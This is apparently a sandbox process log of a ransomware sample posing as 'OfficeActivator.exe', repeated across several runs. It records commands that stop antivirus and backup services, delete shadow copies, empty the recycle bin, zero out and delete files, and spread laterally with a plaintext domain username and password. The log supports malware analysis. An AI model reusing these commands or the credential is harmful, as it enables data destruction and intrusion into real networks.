C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6148 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\SYSTEM32\net.exe

"net.exe" stop avpsus /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop McAfeeDLPAgentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop mfewc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BMR Boot Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop NetBackup BMR MTFTP Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop DefWatch /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccEvtMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccSetMgr /y

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\SYSTEM32\net.exe

"net.exe" stop SavRoam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop RTVscan /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBFCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBIDPService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop Intuit.QuickBooks.FCS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBCFMonitorService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooBackup /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooIT /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop zhudongfangyu /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop stc_raw_agent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VSNAPVSS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamTransportSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamDeploymentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamNFSSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop veeam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop PDVFSService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecVSSProvider /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentAccelerator /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentBrowser /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecDiveciMediaService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecJobEngine /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecManagementService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecRPCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcrSch2Svc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcronisAgent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CASAD2DWebSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CAARCUpdateSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop sophos /y

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccEvtMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBFCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccSetMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop stc_raw_agent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop DefWatch /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooIT /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooBackup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop RTVscan /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SavRoam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBIDPService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop zhudongfangyu /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBCFMonitorService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CAARCUpdateSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CASAD2DWebSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VSNAPVSS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\SYSTEM32\net.exe

"net.exe" use \\10.127.1.41 /USER:SHJPOLICE\amer !Omar2012

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe

"C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe" \10.127.1.41 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\Desktop\OfficeActivator.exe

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\SYSTEM32\arp.exe

"arp" -a

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\OfficeActivator.exe

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=524288 “%s”

C:\Windows\SYSTEM32\net.exe

"net.exe" stop avpsus /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop McAfeeDLPAgentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop mfewc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BMR Boot Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop NetBackup BMR MTFTP Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop DefWatch /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccEvtMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccSetMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop SavRoam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop RTVscan /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBFCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBIDPService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop Intuit.QuickBooks.FCS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBCFMonitorService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooBackup /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooIT /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop zhudongfangyu /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop stc_raw_agent /y

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VSNAPVSS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamTransportSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamDeploymentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamNFSSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop veeam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop PDVFSService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecVSSProvider /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentAccelerator /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentBrowser /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecDiveciMediaService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecJobEngine /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecManagementService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecRPCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcrSch2Svc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcronisAgent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CASAD2DWebSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CAARCUpdateSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop sophos /y

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccEvtMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccSetMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooIT /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop DefWatch /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SavRoam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VSNAPVSS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop zhudongfangyu /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBFCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooBackup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CAARCUpdateSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBIDPService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop stc_raw_agent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop RTVscan /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBCFMonitorService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CASAD2DWebSvc /y

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

C:\Windows\SYSTEM32\net.exe

"net.exe" use \\10.127.1.41 /USER:SHJPOLICE\amer !Omar2012

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\OfficeActivator.exe

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Users\Admin\Desktop\OfficeActivator.exe

"C:\Users\Admin\Desktop\OfficeActivator.exe"

C:\Windows\SYSTEM32\net.exe

"net.exe" stop avpsus /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop McAfeeDLPAgentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop mfewc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BMR Boot Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop NetBackup BMR MTFTP Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop DefWatch /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccEvtMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccSetMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop SavRoam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop RTVscan /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBFCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBIDPService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop Intuit.QuickBooks.FCS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBCFMonitorService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooBackup /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooIT /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop zhudongfangyu /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop stc_raw_agent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VSNAPVSS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamTransportSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamDeploymentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamNFSSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop veeam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop PDVFSService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecVSSProvider /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentAccelerator /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentBrowser /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecDiveciMediaService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecJobEngine /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecManagementService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecRPCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcrSch2Svc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcronisAgent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CASAD2DWebSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CAARCUpdateSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop sophos /y

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop DefWatch /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccEvtMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooIT /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccSetMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop RTVscan /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooBackup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBFCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBIDPService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop stc_raw_agent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBCFMonitorService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop zhudongfangyu /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SavRoam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VSNAPVSS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\system32\net1.exe

